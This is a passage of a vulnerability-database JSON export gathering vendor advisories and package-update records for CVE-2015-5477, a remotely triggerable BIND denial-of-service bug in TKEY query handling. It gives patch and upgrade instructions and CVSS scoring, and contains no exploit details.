{"lastseen": "2018-08-31T11:11:00", "description": "\r\n\r\n=============================================================================\r\nFreeBSD-SA-15:17.bind Security Advisory\r\n The FreeBSD Project\r\n\r\nTopic: BIND remote denial of service vulnerability\r\n\r\nCategory: contrib\r\nModule: bind\r\nAnnounced: 2015-07-28\r\nCredits: ISC\r\nAffects: FreeBSD 8.x and FreeBSD 9.x.\r\nCorrected: 2015-07-28 19:58:54 UTC (stable/9, 9.3-STABLE)\r\n 2015-07-28 19:59:22 UTC (releng/9.3, 9.3-RELEASE-p21)\r\n 2015-07-28 19:58:54 UTC (stable/8, 8.4-STABLE)\r\n 2015-07-28 19:59:22 UTC (releng/8.4, 8.4-RELEASE-p35)\r\nCVE Name: CVE-2015-5477\r\n\r\nFor general information regarding FreeBSD Security Advisories,\r\nincluding descriptions of the fields above, security branches, and the\r\nfollowing sections, please visit <URL:https://security.FreeBSD.org/>.\r\n\r\nI. Background\r\n\r\nBIND 9 is an implementation of the Domain Name System (DNS) protocols.\r\nThe named(8) daemon is an Internet Domain Name Server.\r\n\r\nII. Problem Description\r\n\r\nAn error in the handling of TKEY queries can be exploited by an attacker\r\nfor use as a denial-of-service vector, as a constructed packet can use\r\nthe defect to trigger a REQUIRE assertion failure, causing BIND to exit.\r\n\r\nIII. Impact\r\n\r\nA remote attacker can trigger a crash of a name server. Both recursive and\r\nauthoritative servers are affected, and the exposure can not be mitigated\r\nby either ACLs or configuration options limiting or denying service because\r\nthe exploitable code occurs early in the packet handling, before checks\r\nenforcing those boundaries.\r\n\r\nIV. Workaround\r\n\r\nNo workaround is available, but systems that are not running BIND are not\r\nvulnerable.\r\n\r\nV. Solution\r\n\r\nPerform one of the following:\r\n\r\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\r\nrelease / security branch (releng) dated after the correction date.\r\n\r\nThe named service has to be restarted after the update. A reboot is\r\nrecommended but not required.\r\n\r\n2) To update your vulnerable system via a binary patch:\r\n\r\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\r\nplatforms can be updated via the freebsd-update(8) utility:\r\n\r\n# freebsd-update fetch\r\n# freebsd-update install\r\n\r\nThe named service has to be restarted after the update. A reboot is\r\nrecommended but not required.\r\n\r\n3) To update your vulnerable system via a source code patch:\r\n\r\nThe following patches have been verified to apply to the applicable\r\nFreeBSD release branches.\r\n\r\na) Download the relevant patch from the location below, and verify the\r\ndetached PGP signature using your PGP utility.\r\n\r\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch\r\n# fetch https://security.FreeBSD.org/patches/SA-15:17/bind.patch.asc\r\n# gpg --verify bind.patch.asc\r\n\r\nb) Apply the patch. Execute the following commands as root:\r\n\r\n# cd /usr/src\r\n# patch < /path/to/patch\r\n\r\nc) Recompile the operating system using buildworld and installworld as\r\ndescribed in <URL:https://www.FreeBSD.org/handbook/makeworld.html>.\r\n\r\nRestart the applicable daemons, or reboot the system.\r\n\r\nVI. Correction details\r\n\r\nThe following list contains the correction revision numbers for each\r\naffected branch.\r\n\r\nBranch/path Revision\r\n-------------------------------------------------------------------------\r\nstable/8/ r285977\r\nreleng/8.4/ r285980\r\nstable/9/ r285977\r\nreleng/9.3/ r285980\r\n-------------------------------------------------------------------------\r\n\r\nTo see which files were modified by a particular revision, run the\r\nfollowing command, replacing NNNNNN with the revision number, on a\r\nmachine with Subversion installed:\r\n\r\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\r\n\r\nOr visit the following URL, replacing NNNNNN with the revision number:\r\n\r\n<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>\r\n\r\nVII. References\r\n\r\n<URL:https://kb.isc.org/article/AA-01272>\r\n\r\n<URL:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477>\r\n\r\nThe latest revision of this advisory is available at\r\n<URL:https://security.FreeBSD.org/advisories/FreeBSD-SA-15:17.bind.asc>\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-08-03T00:00:00", "title": "FreeBSD Security Advisory FreeBSD-SA-15:17.bind", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-03T00:00:00", "id": "SECURITYVULNS:DOC:32383", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32383", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:01", "description": "Assert on TKEY request processing.", "edition": 1, "cvss3": {}, "published": "2015-08-03T00:00:00", "title": "ISC bind named DoS", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-03T00:00:00", "id": "SECURITYVULNS:VULN:14619", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14619", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:03:08", "description": "Over 150 different vulnerabilities in system components and libraries.", "edition": 2, "cvss3": {}, "published": "2015-08-17T00:00:00", "title": "Apple Mac OS X / OS X Server multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-5477", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", "CVE-2015-3796", "CVE-2009-5044", "CVE-2015-5783", "CVE-2014-9680", "CVE-2015-5763", "CVE-2014-8767", "CVE-2015-3767", "CVE-2015-3806", "CVE-2015-1791", "CVE-2015-3771", "CVE-2015-3148"], "modified": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14630", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14630", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "edition": 2, "cvss3": {}, "published": "2015-08-01T02:25:40", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: bind-9.10.2-4.P3.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T02:25:40", "id": "FEDORA:50F6A611BAAF", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. This package set contains only export version of BIND libraries, that are used for building ISC DHCP. ", "edition": 2, "cvss3": {}, "published": "2015-08-01T02:27:27", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: bind99-9.9.7-6.P2.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-01T02:27:27", "id": "FEDORA:647FF6124C7D", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "description": "BIND (Berkeley Internet Name Domain) is an implementation of the DNS (Domain Name System) protocols. BIND includes a DNS server (named), which resolves host names to IP addresses; a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating properly. ", "edition": 2, "cvss3": {}, "published": "2015-08-01T02:26:01", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: bind-9.9.6-10.P1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", "CVE-2015-5477"], "modified": "2015-08-01T02:26:01", "id": "FEDORA:4DC6A61361BA", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-02-18T07:36:10", "description": "A denial of service vulnerability has been reported in ISC BIND DNS servers. The vulnerability is due to the way that the DNS server improperly handles invalid TKEY resource records. A remote attacker may exploit this issue by sending a specially crafted DNS query to a DNS server. Successful exploitation may cause the server to crash, resulting in a denial of service condition.", "cvss3": {}, "published": "2020-12-22T00:00:00", "type": "checkpoint_advisories", "title": "ISC BIND TKEY Queries Assertion Failure (CVE-2015-5477)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2020-12-22T00:00:00", "id": "CPAI-2015-1084", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-12-17T11:45:31", "description": "A denial of service vulnerability has been reported in ISC BIND DNS servers. The vulnerability is due to the way that the DNS server improperly handles invalid TKEY resource records. A remote attacker may exploit this issue by sending a specially crafted DNS query to a DNS server. Successful exploitation may cause the server to crash, resulting in a denial of service condition.", "cvss3": {}, "published": "2015-08-01T00:00:00", "type": "checkpoint_advisories", "title": "ISC BIND Invalid TKEY Query Denial Of Service (CVE-2015-5477)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2016-02-14T00:00:00", "id": "CPAI-2015-0908", "href": "", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:49:09", "description": "named in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows\nremote attackers to cause a denial of service (REQUIRE assertion failure\nand daemon exit) via TKEY queries.", "cvss3": {}, "published": "2015-07-28T00:00:00", "type": "ubuntucve", "title": "CVE-2015-5477", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T00:00:00", "id": "UB:CVE-2015-5477", "href": "https://ubuntu.com/security/CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2021-09-27T19:37:27", "description": "**Issue Overview:**\n\nAs <a href=\"https://kb.isc.org/article/AA-01272/0\">reported upstream</a>, an error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit.\n\n \n**Affected Packages:** \n\n\nbind\n\n \n**Issue Correction:** \nRun _yum update bind_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 bind-libs-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-chroot-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-sdb-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-utils-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-devel-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-9.8.2-0.30.rc1.38.amzn1.i686 \n \u00a0\u00a0\u00a0 bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 bind-9.8.2-0.30.rc1.38.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 bind-sdb-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-chroot-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-libs-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-utils-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-debuginfo-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \u00a0\u00a0\u00a0 bind-devel-9.8.2-0.30.rc1.38.amzn1.x86_64 \n \n \n", "cvss3": {}, "published": "2015-07-28T11:32:00", "type": "amazon", "title": "Critical: bind", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-28T11:32:00", "id": "ALAS-2015-573", "href": "https://alas.aws.amazon.com/ALAS-2015-573.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2021-05-13T09:23:39", "description": "[32:9.8.2-0.37.rc1.2]\n- Fix CVE-2015-5477", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ELSA-2015-1513", "href": "http://linux.oracle.com/errata/ELSA-2015-1513.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-05-13T09:24:15", "description": "[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ELSA-2015-1515", "href": "http://linux.oracle.com/errata/ELSA-2015-1515.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-05-13T09:23:48", "description": "[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {}, "published": "2015-07-29T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477"], "modified": "2015-07-29T00:00:00", "id": "ELSA-2015-1514", "href": "http://linux.oracle.com/errata/ELSA-2015-1514.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:20:44", "description": "[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {}, "published": "2015-09-03T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722"], "modified": "2015-09-03T00:00:00", "id": "ELSA-2015-1707", "href": "http://linux.oracle.com/errata/ELSA-2015-1707.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:20:34", "description": "[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {}, "published": "2015-09-03T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722"], "modified": "2015-09-03T00:00:00", "id": "ELSA-2015-1706", "href": "http://linux.oracle.com/errata/ELSA-2015-1706.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:20:59", "description": "[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {}, "published": "2015-12-16T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2015-12-16T00:00:00", "id": "ELSA-2015-2656", "href": "http://linux.oracle.com/errata/ELSA-2015-2656.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-06-04T20:21:20", "description": "[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {}, "published": "2015-12-16T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000"], "modified": "2015-12-16T00:00:00", "id": "ELSA-2015-2658", "href": "http://linux.oracle.com/errata/ELSA-2015-2658.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T14:25:01", "description": "[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "edition": 2, "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "oraclelinux", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "id": "ELSA-2016-1944", "href": "http://linux.oracle.com/errata/ELSA-2016-1944.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-28T14:24:32", "description": "[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "edition": 2, "cvss3": {}, "published": "2016-09-28T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "id": "ELSA-2016-1945", "href": "http://linux.oracle.com/errata/ELSA-2016-1945.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:39", "description": "[32:9.7.0-21.P2.8]\n- Fix CVE-2016-2848\n[32:9.7.0-21.P2.7]\n- Fix CVE-2016-2776\n[32:9.7.0-21.P2.6]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[32:9.7.0-21.P2.5]\n- Fix CVE-2015-8704\n[32:9.7.0-21.P2.4]\n- Fix CVE-2015-8000\n[32:9.7.0-21.P2.3]\n- Fix CVE-2015-5722\n[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-10-20T00:00:00", "type": "oraclelinux", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8500", "CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848"], "modified": "2016-10-20T00:00:00", "id": "ELSA-2016-2094", "href": "http://linux.oracle.com/errata/ELSA-2016-2094.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-07-30T06:24:54", "description": "[30:9.3.6-25.P1.10]\n- Fix CVE-2016-2848\n[30:9.3.6-25.P1.9]\n- Fix CVE-2016-2776\n[30:9.3.6-25.P1.8]\n- Fix issue with patch for CVE-2016-1285 and CVE-2016-1286 found by test suite\n[30:9.3.6-25.P1.7]\n- Fix CVE-2016-1285 and CVE-2016-1286\n[30:9.3.6-25.P1.6]\n- Fix CVE-2015-8704\n[30:9.3.6-25.P1.5]\n- Fix CVE-2015-8000\n[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": 